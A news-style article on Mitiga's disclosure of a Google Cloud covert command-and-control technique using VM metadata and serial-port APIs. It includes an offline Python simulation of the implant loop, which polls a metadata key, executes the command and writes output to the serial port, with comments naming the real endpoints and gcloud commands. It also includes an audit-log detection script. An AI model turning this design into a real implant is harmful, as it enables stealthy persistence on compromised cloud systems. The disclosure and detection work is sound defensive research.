Misconfigured access to the Google Cloud Platform API can create exploitable behavior that leads to service compromise. Protecting stored credentials and enforcing a strict Google Cloud account management policy is essential.
Strange and dangerous behavior within Google Cloud Platform (GCP) was revealed on Thursday by cloud security firm Mitiga. If GCP is not configured correctly, attackers can exploit it to carry out malicious activity in a user's cloud environment, according to a blog post on the Israeli company's website.
The behavior is tied to one of the APIs used by Google Cloud. The API lets users retrieve data from a virtual machine's serial ports. The catch is that a virtual machine in the cloud can also write data to those ports continuously. And because of how Google Cloud categorizes this traffic, administrators have little visibility into it. An attacker's constant calls to the serial port API could give them away, Mitiga says, but the malicious activity is likely to be missed by developers unfamiliar with the specifics of these APIs.
Attackers can get command and control abilities
Another quirk of Google Cloud, noticed by Mitiga, is that it allows users to change a virtual machine's metadata at runtime. Other cloud providers also give users this power, but only when the virtual machine is shut down. Google's virtual machines let users set custom metadata keys with custom values and, by default, let the running VM read those values back from the metadata server. Coupled with the serial port read function, Mitiga said, this creates a full feedback loop that can give attackers command and control capabilities.
The company also illustrated how someone able to use the API can take full administrative control of a system. By configuring a virtual machine to consume attacker-supplied user data (such as a startup script) when the VM boots, attackers can have a script of their choosing load at startup and take control of the system.
Five stages of the attack
Mitiga laid out the attack in five stages. In the first, an attacker obtains Google Cloud credentials carrying the API permissions for setMetadata and getSerialPortOutput on one or more VMs. In the second, using traditional network-based lateral movement methods, the attacker installs malware on the system that communicates over the cloud API.
In the third stage, the attacker sends commands to the victim machine by inserting them into the VM's custom metadata under an agreed-upon key. In the fourth, the victim system continuously reads that key looking for commands; when it finds one, it executes the command and writes the output to a known serial port. In the fifth and final stage, the adversary reads that serial port through the API and receives the output of the command.
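The five stages above, simulated end to end as an added example. This is not Mitiga's code and not Google's API: the metadata server and the serial port are replaced by in-process stand-ins so the loop runs offline, and the comments note the real endpoint or gcloud command each stand-in replaces (assumed from public Compute Engine behavior: the metadata server at metadata.google.internal and serial port 2 at /dev/ttyS1 on a Linux guest). The metadata key name `cmd` is a hypothetical choice.

```python
"""Simulated metadata/serial-port command-and-control loop (added example)."""
import shlex
import subprocess

METADATA_KEY = "cmd"          # hypothetical key agreed between implant and operator
SERIAL_DEVICE = "/dev/ttyS1"  # COM2 on a Linux GCE guest; fetched with --port 2


class FakeMetadataServer:
    """Stand-in for the 'attributes' namespace of the instance metadata server.

    Real victim-side read (no cloud credentials needed from inside the VM):
      GET http://metadata.google.internal/computeMetadata/v1/instance/attributes/cmd
      Header: Metadata-Flavor: Google   (add ?wait_for_change=true to long-poll)
    Real attacker-side write (needs compute.instances.setMetadata):
      gcloud compute instances add-metadata VM --metadata cmd='id'
    """

    def __init__(self):
        self.attributes = {}

    def set_metadata(self, key, value):
        self.attributes[key] = value

    def get_attribute(self, key):
        return self.attributes.get(key)


class FakeSerialPort:
    """Stand-in for /dev/ttyS1.  The attacker reads it remotely with
    gcloud compute instances get-serial-port-output VM --port 2
    (needs compute.instances.getSerialPortOutput)."""

    def __init__(self):
        self.chunks = []

    def write(self, text):
        self.chunks.append(text)

    def read_output(self):
        return "".join(self.chunks)


def run_command(cmd):
    """Run one command (no shell) and capture its combined output."""
    proc = subprocess.run(shlex.split(cmd), capture_output=True, text=True, timeout=10)
    return proc.stdout + proc.stderr


def implant_poll_once(metadata, serial, last_cmd):
    """Stage 4: one pass of the victim-side loop.

    Fetch the key, execute it if it changed since the last pass, and write
    the result to the serial port.  Returns the command seen so the next
    pass can de-duplicate (a real implant would long-poll with
    wait_for_change instead of comparing values).
    """
    cmd = metadata.get_attribute(METADATA_KEY)
    if not cmd or cmd == last_cmd:
        return last_cmd
    output = run_command(cmd)
    serial.write(f"[{METADATA_KEY}] {cmd}\n{output}")
    return cmd


def operator_exchange(metadata, serial, cmd):
    """Stages 3 and 5 from the operator's side: plant a command, let the
    VM's poll run, then collect the serial output."""
    metadata.set_metadata(METADATA_KEY, cmd)     # stage 3: setMetadata
    implant_poll_once(metadata, serial, None)    # stage 4: runs on the VM
    return serial.read_output()                  # stage 5: getSerialPortOutput


def demo():
    """End-to-end run with a harmless constructed command."""
    metadata, serial = FakeMetadataServer(), FakeSerialPort()
    return operator_exchange(metadata, serial, "echo hello-from-vm")


if __name__ == "__main__":
    print(demo())
```

Note that neither side opens a network socket of its own: the implant only talks to the link-local metadata server and a local tty, and the operator only makes authenticated Compute Engine API calls, which is why host- and network-based controls see nothing unusual.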
A Secret Way to Preserve Access to Compromised Systems
Andrew Johnston, Mitiga's principal consultant who wrote the blog, downplayed the threat that the risky API behavior poses to organizations. "As long as you follow all the other security guidelines — credentials are working properly, accounts only have the permissions they need — there's no real threat here," he says. "The problem is that these things are easier said than done. If an attacker gains access to a Google Cloud account with the appropriate permissions, he could use this attack vector to gain access to the systems." "The impact of this situation is that it is a covert way to maintain access to a compromised system," adds Andrew Johnston. "It's not something that would set off alarm bells in a standard SOC environment."
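One way a SOC can make this pattern set off alarm bells, as an added example that is not code from Mitiga or Google: hunt Cloud Audit Logs for a principal that changes a VM's metadata and then repeatedly reads its serial port. Assumptions: the method names below are what Compute Engine records for the two calls, setMetadata appears in the Admin Activity log, and getSerialPortOutput is a Data Access (read) entry that only shows up if Data Access audit logging is enabled for Compute Engine in the project (verify both against your own logs). The log lines are constructed, and `demo-proj`, the principals and the instance names are hypothetical.

```python
"""Detect metadata-write followed by repeated serial-port reads (added example)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

SET_METADATA = "v1.compute.instances.setMetadata"          # assumed method name
GET_SERIAL = "v1.compute.instances.getSerialPortOutput"    # assumed method name

# Logs Explorer query to export the two call types for offline analysis.
LOG_FILTER = (
    'logName:"cloudaudit.googleapis.com" AND '
    f'protoPayload.methodName=("{SET_METADATA}" OR "{GET_SERIAL}")'
)


def _entry(ts, method, principal, instance):
    """Build one audit-log entry trimmed to the fields the detector uses."""
    return {
        "timestamp": ts,
        "protoPayload": {
            "methodName": method,
            "authenticationInfo": {"principalEmail": principal},
            "resourceName": f"projects/demo-proj/zones/us-central1-a/instances/{instance}",
        },
    }


# Constructed sample: one principal that writes metadata and then polls the
# serial port eight times, and one admin who writes metadata and reads once.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    _entry("2022-09-15T10:00:00Z", SET_METADATA, "svc-ci@demo-proj.iam.gserviceaccount.com", "web-1"),
    *[_entry(f"2022-09-15T10:{m:02d}:00Z", GET_SERIAL, "svc-ci@demo-proj.iam.gserviceaccount.com", "web-1")
      for m in range(1, 9)],
    _entry("2022-09-15T11:00:00Z", SET_METADATA, "admin@example.com", "web-2"),
    _entry("2022-09-15T11:05:00Z", GET_SERIAL, "admin@example.com", "web-2"),
])


def parse_entries(text):
    """Parse newline-delimited JSON audit entries into flat records."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        raw = json.loads(line)
        payload = raw["protoPayload"]
        entries.append({
            "ts": datetime.fromisoformat(raw["timestamp"].replace("Z", "+00:00")),
            "method": payload["methodName"],
            "principal": payload["authenticationInfo"]["principalEmail"],
            "instance": payload["resourceName"].rsplit("/", 1)[-1],
        })
    return entries


def find_metadata_c2(entries, min_reads=5, window=timedelta(hours=1)):
    """Flag (principal, instance) pairs where a setMetadata call is followed
    by at least `min_reads` getSerialPortOutput calls inside `window`."""
    by_pair = defaultdict(list)
    for e in entries:
        by_pair[(e["principal"], e["instance"])].append(e)

    findings = []
    for (principal, instance), events in by_pair.items():
        events.sort(key=lambda e: e["ts"])
        for write in (e for e in events if e["method"] == SET_METADATA):
            reads = [r for r in events
                     if r["method"] == GET_SERIAL
                     and write["ts"] <= r["ts"] <= write["ts"] + window]
            if len(reads) >= min_reads:
                findings.append({"principal": principal, "instance": instance,
                                 "set_at": write["ts"].isoformat(),
                                 "serial_reads": len(reads)})
                break  # one finding per pair is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_metadata_c2(parse_entries(SAMPLE_LOG)):
        print(finding)
```

The thresholds are a starting point, not a rule: a build pipeline that legitimately sets metadata and tails the serial console will trip this too, so tune `min_reads` and `window` per project and pair the detection with the least-privilege advice above, so that few principals hold both setMetadata and getSerialPortOutput on the same instances.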
Although Mitiga did not find the API behavior being used in the wild, the consultant explains that it is important to pass the information on to the Google Cloud community. "High-level attackers are well aware of a number of attack vectors that aren't available to the general public," he says. "The best way to disarm such groups is to identify these techniques and publicize them, because when organizations are aware, they can improve their preparedness for breaches."